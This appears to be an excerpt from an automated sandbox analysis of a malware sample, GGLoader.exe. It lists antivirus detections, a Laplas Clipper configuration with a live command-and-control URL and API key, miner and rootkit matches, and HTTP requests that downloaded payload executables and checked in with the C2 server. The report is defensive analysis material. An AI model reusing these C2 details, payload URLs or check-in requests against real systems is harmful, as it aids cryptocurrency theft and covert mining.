                        2024-10-04T19:14:01.488048+0200  2803304  3         Unknown Traffic                192.168.2.4  49740        45.159.189.105  80                TCP
                        2024-10-04T19:14:57.437285+0200  2803304  3         Unknown Traffic                192.168.2.4  50007        45.159.189.105  80                TCP
                        2024-10-04T19:14:59.158697+0200  2803304  3         Unknown Traffic                192.168.2.4  50008        45.159.189.105  80                TCP

                        AV Detection

                        Source: GGLoader.exe | Avira: detected
                        Source: C:\Program Files\Google\Chrome\updater.exe | Avira: detection malicious, Label: HEUR/AGEN.1325648
                        Source: C:\Users\user\AppData\Local\Temp\LicCheck.exe | Avira: detection malicious, Label: HEUR/AGEN.1317771
                        Source: C:\Users\user\AppData\Roaming\Win32Sync\svcupdater.exe | Avira: detection malicious, Label: HEUR/AGEN.1319806
                        Source: C:\Users\user\AppData\Local\Temp\LicSend.exe | Avira: detection malicious, Label: HEUR/AGEN.1325648
                        Source: svcupdater.exe.7904.35.memstrmin | Malware Configuration Extractor: Laplas Clipper {"C2 url": "http://45.159.189.105/bot/", "API key": "5ef1aac7b3430729f6cbc95fb4d2d2a62582e7382955ffc87026077cb28ab31e"}
                        Source: C:\Program Files\Google\Chrome\updater.exe | ReversingLabs: Detection: 79%
                        Source: C:\Users\user\AppData\Local\Temp\LicCheck.exe | ReversingLabs: Detection: 79%
                        Source: C:\Users\user\AppData\Local\Temp\LicSend.exe | ReversingLabs: Detection: 79%
                        Source: C:\Users\user\AppData\Local\Temp\poduiwcd.tmp | ReversingLabs: Detection: 75%
                        Source: GGLoader.exe | ReversingLabs: Detection: 76%
                        Source: Submitted Sample | Integrated Neural Analysis Model: Matched 99.9% probability
                        Source: C:\Program Files\Google\Chrome\updater.exe | Joe Sandbox ML: detected
                        Source: C:\Users\user\AppData\Local\Temp\LicCheck.exe | Joe Sandbox ML: detected
                        Source: C:\Users\user\AppData\Local\Temp\LicenseGet.exe | Joe Sandbox ML: detected
                        Source: C:\Users\user\AppData\Local\Temp\poduiwcd.tmp | Joe Sandbox ML: detected
                        Source: C:\Users\user\AppData\Local\Temp\LicSend.exe | Joe Sandbox ML: detected
                        Source: GGLoader.exe | Joe Sandbox ML: detected
                        Source: C:\Windows\System32\dialer.exe | Code function: 37_2_00007FF790DC1000 CryptAcquireContextW,CryptGenRandom,CryptReleaseContext,37_2_00007FF790DC1000

                        Bitcoin Miner

                        Source: Yara match | File source: 37.2.dialer.exe.7ff790dc0000.0.unpack, type: UNPACKEDPE
                        Source: Yara match | File source: 40.2.powershell.exe.1c51e800000.0.unpack, type: UNPACKEDPE
                        Source: Yara match | File source: 7.2.LicSend.exe.7ff7d3ba5900.2.unpack, type: UNPACKEDPE
                        Source: Yara match | File source: 37.2.dialer.exe.7ff790dc60b0.1.unpack, type: UNPACKEDPE
                        Source: Yara match | File source: 40.2.powershell.exe.1c52eb9aeb0.7.raw.unpack, type: UNPACKEDPE
                        Source: Yara match | File source: 38.2.powershell.exe.42cce80.0.raw.unpack, type: UNPACKEDPE
                        Source: Yara match | File source: 40.2.powershell.exe.1c51e800000.0.raw.unpack, type: UNPACKEDPE
                        Source: Yara match | File source: 7.2.LicSend.exe.7ff7d3ba5900.2.raw.unpack, type: UNPACKEDPE
                        Source: Yara match | File source: 40.2.powershell.exe.1c52eb9aeb0.7.unpack, type: UNPACKEDPE
                        Source: Yara match | File source: 37.2.dialer.exe.7ff790dc60b0.1.raw.unpack, type: UNPACKEDPE
                        Source: Yara match | File source: 38.2.powershell.exe.42cce80.0.unpack, type: UNPACKEDPE
                        Source: Yara match | File source: 7.2.LicSend.exe.7ff7d3ba91b0.3.unpack, type: UNPACKEDPE
                        Source: Yara match | File source: 7.2.LicSend.exe.7ff7d3ba91b0.3.raw.unpack, type: UNPACKEDPE
                        Source: Yara match | File source: 7.2.LicSend.exe.7ff7d3b90000.1.unpack, type: UNPACKEDPE
                        Source: Yara match | File source: 00000028.00000002.2555004791.000001C52EB9A000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                        Source: Yara match | File source: 00000026.00000002.2339760412.00000000041A9000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                        Source: Yara match | File source: 00000025.00000002.2178381779.00007FF790DC6000.00000002.00000001.01000000.00000000.sdmp, type: MEMORY
                        Source: Yara match | File source: 00000007.00000002.2175579159.00007FF7D3BA3000.00000004.00000001.01000000.0000000B.sdmp, type: MEMORY
                        Source: Yara match | File source: 00000028.00000002.2236987878.000001C51E800000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
                        Source: Yara match | File source: Process Memory Space: LicSend.exe PID: 7948, type: MEMORYSTR
                        Source: Yara match | File source: Process Memory Space: powershell.exe PID: 8068, type: MEMORYSTR
                        Source: GGLoader.exe | Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
                        Source: unknown | HTTPS traffic detected: 185.166.143.49:443 -> 192.168.2.4:49730 version: TLS 1.2
                        Source: GGLoader.exe | Static PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
                        Source: Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System.Management.Automation\v4.0_3.0.0.0__31bf3856ad364e35\System.Management.Automation.pdbQZmW source: powershell.exe, 00000001.00000002.1955811622.000001EC48C05000.00000004.00000020.00020000.00000000.sdmp
                        Source: Binary string: .@\??\C:\Users\user\AppData\Local\Temp\wctAB5F.tmp.pdb source: svchost.exe, 00000034.00000000.2285237009.000001ADEC042000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000034.00000002.2957094411.000001ADEC042000.00000004.00000001.00020000.00000000.sdmp
                        Source: Binary string: \??\C:\Windows\dll\mscorlib.pdb source: powershell.exe, 00000026.00000002.2367295184.0000000005B95000.00000004.00000020.00020000.00000000.sdmp
                        Source: Binary string: @\??\C:\Users\user\AppData\Local\Temp\wct3D66.tmp.pdb source: svchost.exe, 00000034.00000002.2957703615.000001ADEC05C000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000034.00000000.2285310844.000001ADEC05C000.00000004.00000001.00020000.00000000.sdmp
                        Source: Binary string: \??\C:\Users\user\AppData\Local\Temp\Symbols\ntkrnlmp.pdb\68A17FAF3012B7846079AEECDBE0A5831\download.error source: svchost.exe, 00000034.00000000.2285098405.000001ADEC02B000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000034.00000002.2956162818.000001ADEC02B000.00000004.00000001.00020000.00000000.sdmp
                        Source: Binary string: H:\CRYPTOCOIN\Mining\Miner\SilentCryptoMiner\r77-rootkit-master\Stager\obj\x64\Release\Stager.pdb source: LicSend.exe, 00000007.00000002.2175579159.00007FF7D3BA3000.00000004.00000001.01000000.0000000B.sdmp, powershell.exe, 00000026.00000002.2339760412.00000000041A9000.00000004.00000800.00020000.00000000.sdmp
                        Source: Binary string: "@\??\C:\Users\user\AppData\Local\Temp\Symbols\ntkrnlmp.pdb\68A17FAF3012B7846079AEECDBE0A5831 source: svchost.exe, 00000034.00000002.2957703615.000001ADEC05C000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000034.00000000.2285310844.000001ADEC05C000.00000004.00000001.00020000.00000000.sdmp
                        Source: Binary string: @\??\C:\Users\user\AppData\Local\Temp\Symbols\ntkrnlmp.pdb\68A17FAF3012B7846079AEECDBE0A5831\download.error source: svchost.exe, 00000034.00000000.2285098405.000001ADEC02B000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000034.00000002.2956162818.000001ADEC02B000.00000004.00000001.00020000.00000000.sdmp
                        Source: Binary string: ,@\??\C:\Users\user\AppData\Local\Temp\wmsetup.log.pdb source: svchost.exe, 00000034.00000000.2285237009.000001ADEC042000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000034.00000002.2957094411.000001ADEC042000.00000004.00000001.00020000.00000000.sdmp
                        Source: Binary string: ore.pdb source: powershell.exe, 00000026.00000002.2367295184.0000000005B4C000.00000004.00000020.00020000.00000000.sdmp
                        Source: Binary string: .@\??\C:\Users\user\AppData\Local\Temp\Symbols\winload_prod.pdb source: svchost.exe, 00000034.00000002.2957703615.000001ADEC05C000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000034.00000000.2285310844.000001ADEC05C000.00000004.00000001.00020000.00000000.sdmp
                        Source: Binary string: \??\C:\Windows\dll\mscorlib.pdbD source: powershell.exe, 00000026.00000002.2367295184.0000000005B95000.00000004.00000020.00020000.00000000.sdmp
                        Source: Binary string: (@\??\C:\Users\user\AppData\Local\Temp\Symbols\winload_prod.pdb\01AB9056EA9380F71644C4339E3FA1AC2\download.error source: svchost.exe, 00000034.00000000.2285098405.000001ADEC02B000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000034.00000002.2956162818.000001ADEC02B000.00000004.00000001.00020000.00000000.sdmp
                        Source: Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_64\mscorlib\v4.0_4.0.0.0__b77a5c561934e089\mscorlib.pdb source: powershell.exe, 00000001.00000002.1965111928.000001EC48EB5000.00000004.00000020.00020000.00000000.sdmp
                        Source: Binary string: mscorlib.pdb source: powershell.exe, 00000026.00000002.2213441971.0000000002851000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000026.00000002.2367295184.0000000005B4C000.00000004.00000020.00020000.00000000.sdmp
                        Source: Binary string: \??\C:\Users\user\AppData\Local\Temp\Symbols\ntkrnlmp.pdb\68A17FAF3012B7846079AEECDBE0A5831 source: svchost.exe, 00000034.00000000.2285237009.000001ADEC042000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000034.00000002.2957094411.000001ADEC042000.00000004.00000001.00020000.00000000.sdmp
                        Source: Binary string: \??\C:\Users\user\AppData\Local\Temp\Symbols\winload_prod.pdb\01AB9056EA9380F71644C4339E3FA1AC2 source: svchost.exe, 00000034.00000000.2285237009.000001ADEC042000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000034.00000002.2957094411.000001ADEC042000.00000004.00000001.00020000.00000000.sdmp
                        Source: Binary string: tem.Core.pdb source: powershell.exe, 00000026.00000002.2367295184.0000000005B4C000.00000004.00000020.00020000.00000000.sdmp
                        Source: Binary string: \??\C:\Users\user\AppData\Local\Temp\Symbols\winload_prod.pdb\01AB9056EA9380F71644C4339E3FA1AC2.pdbr source: svchost.exe, 00000034.00000000.2285237009.000001ADEC042000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000034.00000002.2957094411.000001ADEC042000.00000004.00000001.00020000.00000000.sdmp
                        Source: Binary string: t.Automation.pdb_ source: powershell.exe, 00000001.00000002.1951237178.000001EC48B7C000.00000004.00000020.00020000.00000000.sdmp
                        Source: Binary string: \??\C:\Windows\mscorlib.pdb23~W4 source: powershell.exe, 00000026.00000002.2367295184.0000000005B4C000.00000004.00000020.00020000.00000000.sdmp
                        Source: Binary string: "@\??\C:\Users\user\AppData\Local\Temp\Symbols\ntkrnlmp.pdb source: svchost.exe, 00000034.00000002.2957703615.000001ADEC05C000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000034.00000000.2285310844.000001ADEC05C000.00000004.00000001.00020000.00000000.sdmp
                        Source: Binary string: \??\C:\Windows\mscorlib.pdb:3FW3 source: powershell.exe, 00000026.00000002.2367295184.0000000005B4C000.00000004.00000020.00020000.00000000.sdmp
                        Source: Binary string: System.Core.pdb source: powershell.exe, 00000028.00000002.2583801472.000001C536CC8000.00000004.00000020.00020000.00000000.sdmp
                        Source: Binary string: WINLOA~1.PDB source: svchost.exe, 00000034.00000000.2285237009.000001ADEC042000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000034.00000002.2957094411.000001ADEC042000.00000004.00000001.00020000.00000000.sdmp
                        Source: Binary string: @\??\C:\Users\user\AppData\Local\Temp\Symbols\ntkrnlmp.pdb\68A17FAF3012B7846079AEECDBE0A5831\ntkrnlmp.pdb source: svchost.exe, 00000034.00000000.2285098405.000001ADEC02B000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000034.00000002.2956162818.000001ADEC02B000.00000004.00000001.00020000.00000000.sdmp
                        Source: Binary string: *@\??\C:\Users\user\AppData\Local\Temp\Symbols\winload_prod.pdb source: svchost.exe, 00000034.00000002.2957703615.000001ADEC05C000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000034.00000000.2285310844.000001ADEC05C000.00000004.00000001.00020000.00000000.sdmp
                        Source: Binary string: \??\C:\Users\user\AppData\Local\Temp\Symbols\winload_prod.pdb\01AB9056EA9380F71644C4339E3FA1AC2\winload_prod.pdb source: svchost.exe, 00000034.00000000.2285237009.000001ADEC042000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000034.00000002.2957094411.000001ADEC042000.00000004.00000001.00020000.00000000.sdmp
                        Source: Binary string: *@\??\C:\Users\user\AppData\Local\Temp\Symbols\ntkrnlmp.pdb* source: svchost.exe, 00000034.00000002.2957703615.000001ADEC05C000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000034.00000000.2285310844.000001ADEC05C000.00000004.00000001.00020000.00000000.sdmp
                        Source: Binary string: @\??\C:\Users\user\AppData\Local\Temp\Symbols\winload_prod.pdb\01AB9056EA9380F71644C4339E3FA1AC2\winload_prod.pdb source: svchost.exe, 00000034.00000002.2957703615.000001ADEC05C000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000034.00000000.2285310844.000001ADEC05C000.00000004.00000001.00020000.00000000.sdmp
                        Source: C:\Windows\System32\dialer.exe | Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0F87369F-A4E5-4CFC-BD3E-73E6154572DD}
                        Source: C:\Windows\System32\dialer.exe | Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\TreatAs
                        Source: C:\Windows\System32\dialer.exe | Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\InprocServer32
                        Source: C:\Windows\System32\dialer.exe | Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\InprocHandler32
                        Source: C:\Windows\System32\dialer.exe | Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\InprocHandler
                        Source: C:\Windows\System32\dialer.exe | Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0F87369F-A4E5-4CFC-BD3E-73E6154572DD}
                        Source: C:\Windows\System32\dialer.exe | Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\TreatAs
                        Source: C:\Windows\System32\dialer.exe | Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\InprocServer32
                        Source: C:\Windows\System32\dialer.exe | Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\InprocHandler32
                        Source: C:\Windows\System32\dialer.exe | Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\InprocHandler
                        Source: C:\Windows\System32\dialer.exe | Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\LocalServer32
                        Source: C:\Windows\System32\dialer.exe | Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\LocalServer
                        Source: C:\Windows\System32\dialer.exe | Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0F87369F-A4E5-4CFC-BD3E-73E6154572DD}
                        Source: C:\Windows\System32\dialer.exe | Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\Elevation
                        Source: C:\Windows\System32\dialer.exe | Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0F87369F-A4E5-4CFC-BD3E-73E6154572DD}
                        Source: C:\Windows\System32\dialer.exe | Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\TreatAs
                        Source: C:\Users\user\AppData\Roaming\Win32Sync\svcupdater.exe | Code function: 35_2_00C0A1F1 FindFirstFileExW,FindNextFileW,FindClose,FindClose, 35_2_00C0A1F1
                        Source: C:\Windows\System32\conhost.exe | Code function: 39_2_000002505E59BE3C FindFirstFileExW, 39_2_000002505E59BE3C
                        Source: C:\Windows\System32\conhost.exe | Code function: 41_2_000001C08C1BBE3C FindFirstFileExW, 41_2_000001C08C1BBE3C
                        Source: C:\Windows\System32\dllhost.exe | Code function: 42_2_000002131118BE3C FindFirstFileExW, 42_2_000002131118BE3C
                        Source: C:\Windows\System32\winlogon.exe | Code function: 43_2_00000225DC64BE3C FindFirstFileExW, 43_2_00000225DC64BE3C
                        Source: C:\Users\user\AppData\Local\Temp\LicSend.exe | Code function: 4x nop then push rbx 7_2_00007FF7D3B99F43

                        Networking

                        Source: Network traffic | Suricata IDS: 2039775 - Severity 1 - ET MALWARE Laplas Clipper - Regex CnC Request : 192.168.2.4:49739 -> 45.159.189.105:80
                        Source: Network traffic | Suricata IDS: 2039776 - Severity 1 - ET MALWARE Laplas Clipper - SetOnline CnC Checkin : 192.168.2.4:49740 -> 45.159.189.105:80
                        Source: Network traffic | Suricata IDS: 2039775 - Severity 1 - ET MALWARE Laplas Clipper - Regex CnC Request : 192.168.2.4:50007 -> 45.159.189.105:80
                        Source: Network traffic | Suricata IDS: 2039776 - Severity 1 - ET MALWARE Laplas Clipper - SetOnline CnC Checkin : 192.168.2.4:50008 -> 45.159.189.105:80
                        Source: Network traffic | Suricata IDS: 2018581 - Severity 1 - ET MALWARE Single char EXE direct download likely trojan (multiple families) : 192.168.2.4:49730 -> 185.166.143.49:443
                        Source: powershell.exe, 00000001.00000002.1828229655.000001EC31B7B000.00000004.00000800.00020000.00000000.sdmpString found in memory: Content-Security-Policy: style-src 'self' 'unsafe-inline' https://aui-cdn.atlassian.com/ https://cdn.cookielaw.org/ https://bbc-object-storage--frontbucket.us-east-1.prod.public.atl-paas.net/ https://bbc-object-storage--frontbucket.us-east-1.staging.public.atl-paas.net/; base-uri 'self'; default-src 'self' 'unsafe-inline' 'unsafe-eval' data: blob: *; connect-src bitbucket.org *.bitbucket.org bb-inf.net *.bb-inf.net id.atlassian.com api.atlassian.com api.stg.atlassian.com wss://bitbucketci-ws-service.services.atlassian.com/ wss://bitbucketci-ws-service.stg.services.atlassian.com/ wss://bitbucketci-ws-service.dev.services.atlassian.com/ analytics.atlassian.com atlassian-cookies--categories.us-east-1.prod.public.atl-paas.net as.atlassian.com api-private.stg.atlassian.com api-private.atlassian.com xp.atlassian.com atl-global.atlassian.com cofs.staging.public.atl-paas.net cofs.prod.public.atl-paas.net fd-assets.prod.atl-paas.net flight-deck-assets-bifrost.prod-east.frontend.public.atl-paas.net intake.opbeat.com api.media.atlassian.com api.segment.io xid.statuspage.io xid.atlassian.com xid.sourcetreeapp.com bam.nr-data.net bam-cell.nr-data.net www.google-analytics.com sentry.io *.ingest.sentry.io events.launchdarkly.com app.launchdarkly.com statsigapi.net fd-config.us-east-1.prod.public.atl-paas.net fd-config-bifrost.prod-east.frontend.public.atl-paas.net micros--prod-west--bitbucketci-file-service--files.s3.us-west-1.amazonaws.com micros--prod-east--bitbucketci-file-service--files.s3.amazonaws.com micros--stg-west--bitbucketci-file-service--files.s3.us-west-1.amazonaws.com micros--stg-east--bitbucketci-file-service--files.s3.amazonaws.com micros--ddev-west--bitbucketci-file-service--files.s3.ap-southeast-2.amazonaws.com bqlf8qjztdtr.statuspage.io 
https://bbc-object-storage--frontbucket.us-east-1.prod.public.atl-paas.net/ https://bbc-object-storage--frontbucket.us-east-1.staging.public.atl-paas.net/; frame-ancestors 'self' start.atlassian.com start.stg.atlassian.com atlaskit.atlassian.com bitbucket.org; object-src 'none'; script-src 'unsafe-eval' 'strict-dynamic' 'unsafe-inline' 'self' http: https: https://remote-app-switcher.stg-east.frontend.public.atl-paas.net https://remote-app-switcher.prod-east.frontend.public.atl-paas.net https://bbc-object-storage--frontbucket.us-east-1.prod.public.atl-paas.net/ https://bbc-object-storage--frontbucket.us-east-1.staging.public.atl-paas.net/; report-uri https://web-security-reports.services.atlassian.com/csp-report/bb-website
                        Source: powershell.exe, 00000001.00000002.1828229655.000001EC31BD4000.00000004.00000800.00020000.00000000.sdmpString found in memory: style-src 'self' 'unsafe-inline' https://aui-cdn.atlassian.com/ https://cdn.cookielaw.org/ https://bbc-object-storage--frontbucket.us-east-1.prod.public.atl-paas.net/ https://bbc-object-storage--frontbucket.us-east-1.staging.public.atl-paas.net/; base-uri 'self'; default-src 'self' 'unsafe-inline' 'unsafe-eval' data: blob: *; connect-src bitbucket.org *.bitbucket.org bb-inf.net *.bb-inf.net id.atlassian.com api.atlassian.com api.stg.atlassian.com wss://bitbucketci-ws-service.services.atlassian.com/ wss://bitbucketci-ws-service.stg.services.atlassian.com/ wss://bitbucketci-ws-service.dev.services.atlassian.com/ analytics.atlassian.com atlassian-cookies--categories.us-east-1.prod.public.atl-paas.net as.atlassian.com api-private.stg.atlassian.com api-private.atlassian.com xp.atlassian.com atl-global.atlassian.com cofs.staging.public.atl-paas.net cofs.prod.public.atl-paas.net fd-assets.prod.atl-paas.net flight-deck-assets-bifrost.prod-east.frontend.public.atl-paas.net intake.opbeat.com api.media.atlassian.com api.segment.io xid.statuspage.io xid.atlassian.com xid.sourcetreeapp.com bam.nr-data.net bam-cell.nr-data.net www.google-analytics.com sentry.io *.ingest.sentry.io events.launchdarkly.com app.launchdarkly.com statsigapi.net fd-config.us-east-1.prod.public.atl-paas.net fd-config-bifrost.prod-east.frontend.public.atl-paas.net micros--prod-west--bitbucketci-file-service--files.s3.us-west-1.amazonaws.com micros--prod-east--bitbucketci-file-service--files.s3.amazonaws.com micros--stg-west--bitbucketci-file-service--files.s3.us-west-1.amazonaws.com micros--stg-east--bitbucketci-file-service--files.s3.amazonaws.com micros--ddev-west--bitbucketci-file-service--files.s3.ap-southeast-2.amazonaws.com bqlf8qjztdtr.statuspage.io https://bbc-object-storage--frontbucket.us-east-1.prod.public.atl-paas.net/ 
https://bbc-object-storage--frontbucket.us-east-1.staging.public.atl-paas.net/; frame-ancestors 'self' start.atlassian.com start.stg.atlassian.com atlaskit.atlassian.com bitbucket.org; object-src 'none'; script-src 'unsafe-eval' 'strict-dynamic' 'unsafe-inline' 'self' http: https: https://remote-app-switcher.stg-east.frontend.public.atl-paas.net https://remote-app-switcher.prod-east.frontend.public.atl-paas.net https://bbc-object-storage--frontbucket.us-east-1.prod.public.atl-paas.net/ https://bbc-object-storage--frontbucket.us-east-1.staging.public.atl-paas.net/; report-uri https://web-security-reports.services.atlassian.com/csp-report/bb-website
                        Source: powershell.exe, 00000001.00000002.1828229655.000001EC31BC0000.00000004.00000800.00020000.00000000.sdmpString found in memory: object-src 'none'; style-src 'self' 'unsafe-inline' https://aui-cdn.atlassian.com/ https://cdn.cookielaw.org/ https://bbc-object-storage--frontbucket.us-east-1.prod.public.atl-paas.net/ https://bbc-object-storage--frontbucket.us-east-1.staging.public.atl-paas.net/; frame-ancestors 'self' start.atlassian.com start.stg.atlassian.com atlaskit.atlassian.com bitbucket.org; default-src 'self' 'unsafe-inline' 'unsafe-eval' data: blob: *; connect-src bitbucket.org *.bitbucket.org bb-inf.net *.bb-inf.net id.atlassian.com api.atlassian.com api.stg.atlassian.com wss://bitbucketci-ws-service.services.atlassian.com/ wss://bitbucketci-ws-service.stg.services.atlassian.com/ wss://bitbucketci-ws-service.dev.services.atlassian.com/ analytics.atlassian.com atlassian-cookies--categories.us-east-1.prod.public.atl-paas.net as.atlassian.com api-private.stg.atlassian.com api-private.atlassian.com xp.atlassian.com atl-global.atlassian.com cofs.staging.public.atl-paas.net cofs.prod.public.atl-paas.net fd-assets.prod.atl-paas.net flight-deck-assets-bifrost.prod-east.frontend.public.atl-paas.net intake.opbeat.com api.media.atlassian.com api.segment.io xid.statuspage.io xid.atlassian.com xid.sourcetreeapp.com bam.nr-data.net bam-cell.nr-data.net www.google-analytics.com sentry.io *.ingest.sentry.io events.launchdarkly.com app.launchdarkly.com statsigapi.net fd-config.us-east-1.prod.public.atl-paas.net fd-config-bifrost.prod-east.frontend.public.atl-paas.net micros--prod-west--bitbucketci-file-service--files.s3.us-west-1.amazonaws.com micros--prod-east--bitbucketci-file-service--files.s3.amazonaws.com micros--stg-west--bitbucketci-file-service--files.s3.us-west-1.amazonaws.com micros--stg-east--bitbucketci-file-service--files.s3.amazonaws.com micros--ddev-west--bitbucketci-file-service--files.s3.ap-southeast-2.amazonaws.com 
bqlf8qjztdtr.statuspage.io https://bbc-object-storage--frontbucket.us-east-1.prod.public.atl-paas.net/ https://bbc-object-storage--frontbucket.us-east-1.staging.public.atl-paas.net/; script-src 'unsafe-eval' 'strict-dynamic' 'unsafe-inline' 'self' http: https: https://remote-app-switcher.stg-east.frontend.public.atl-paas.net https://remote-app-switcher.prod-east.frontend.public.atl-paas.net https://bbc-object-storage--frontbucket.us-east-1.prod.public.atl-paas.net/ https://bbc-object-storage--frontbucket.us-east-1.staging.public.atl-paas.net/; base-uri 'self'; report-uri https://web-security-reports.services.atlassian.com/csp-report/bb-website
                        Source: powershell.exe, 00000001.00000002.1828229655.000001EC31B1D000.00000004.00000800.00020000.00000000.sdmp. String found in memory: Content-Security-Policy: object-src 'none'; style-src 'self' 'unsafe-inline' https://aui-cdn.atlassian.com/ https://cdn.cookielaw.org/ https://bbc-object-storage--frontbucket.us-east-1.prod.public.atl-paas.net/ https://bbc-object-storage--frontbucket.us-east-1.staging.public.atl-paas.net/; frame-ancestors 'self' start.atlassian.com start.stg.atlassian.com atlaskit.atlassian.com bitbucket.org; default-src 'self' 'unsafe-inline' 'unsafe-eval' data: blob: *; connect-src bitbucket.org *.bitbucket.org bb-inf.net *.bb-inf.net id.atlassian.com api.atlassian.com api.stg.atlassian.com wss://bitbucketci-ws-service.services.atlassian.com/ wss://bitbucketci-ws-service.stg.services.atlassian.com/ wss://bitbucketci-ws-service.dev.services.atlassian.com/ analytics.atlassian.com atlassian-cookies--categories.us-east-1.prod.public.atl-paas.net as.atlassian.com api-private.stg.atlassian.com api-private.atlassian.com xp.atlassian.com atl-global.atlassian.com cofs.staging.public.atl-paas.net cofs.prod.public.atl-paas.net fd-assets.prod.atl-paas.net flight-deck-assets-bifrost.prod-east.frontend.public.atl-paas.net intake.opbeat.com api.media.atlassian.com api.segment.io xid.statuspage.io xid.atlassian.com xid.sourcetreeapp.com bam.nr-data.net bam-cell.nr-data.net www.google-analytics.com sentry.io *.ingest.sentry.io events.launchdarkly.com app.launchdarkly.com statsigapi.net fd-config.us-east-1.prod.public.atl-paas.net fd-config-bifrost.prod-east.frontend.public.atl-paas.net micros--prod-west--bitbucketci-file-service--files.s3.us-west-1.amazonaws.com micros--prod-east--bitbucketci-file-service--files.s3.amazonaws.com micros--stg-west--bitbucketci-file-service--files.s3.us-west-1.amazonaws.com micros--stg-east--bitbucketci-file-service--files.s3.amazonaws.com micros--ddev-west--bitbucketci-file-service--files.s3.ap-southeast-2.amazonaws.com bqlf8qjztdtr.statuspage.io https://bbc-object-storage--frontbucket.us-east-1.prod.public.atl-paas.net/ https://bbc-object-storage--frontbucket.us-east-1.staging.public.atl-paas.net/; script-src 'unsafe-eval' 'strict-dynamic' 'unsafe-inline' 'self' http: https: https://remote-app-switcher.stg-east.frontend.public.atl-paas.net https://remote-app-switcher.prod-east.frontend.public.atl-paas.net https://bbc-object-storage--frontbucket.us-east-1.prod.public.atl-paas.net/ https://bbc-object-storage--frontbucket.us-east-1.staging.public.atl-paas.net/; base-uri 'self'; report-uri https://web-security-reports.services.atlassian.com/csp-report/bb-website
                        Source: global traffic. HTTP traffic detected: GET /5940jg9834/gf3443f3/raw/0adfaef4f847a17ea4e4f656dcd85e76293780ed/D.exe HTTP/1.1; Host: bitbucket.org; Connection: Keep-Alive
                        Source: global traffic. HTTP traffic detected: GET /recheatsorg/recheatsdirect/raw/00eb2d0b436591fce1153baca762509e762f2ce4/CLP.exe HTTP/1.1; Host: bitbucket.org
                        Source: global traffic. HTTP traffic detected: GET /recheatsorg/recheatsdirect/raw/00eb2d0b436591fce1153baca762509e762f2ce4/Devmin.exe HTTP/1.1; Host: bitbucket.org
                        Source: global traffic. HTTP traffic detected: GET /bot/regex HTTP/1.1; Host: 45.159.189.105; Cache-Control: no-cache
                        Source: global traffic. HTTP traffic detected: GET /bot/online?guid=724471\\user&key=5ef1aac7b3430729f6cbc95fb4d2d2a62582e7382955ffc87026077cb28ab31e HTTP/1.1; Host: 45.159.189.105; Cache-Control: no-cache
                        Source: global traffic. HTTP traffic detected: GET /bot/regex HTTP/1.1; Host: 45.159.189.105; Cache-Control: no-cache
                        Source: global traffic. HTTP traffic detected: GET /bot/online?guid=724471\\user&key=5ef1aac7b3430729f6cbc95fb4d2d2a62582e7382955ffc87026077cb28ab31e HTTP/1.1; Host: 45.159.189.105; Cache-Control: no-cache
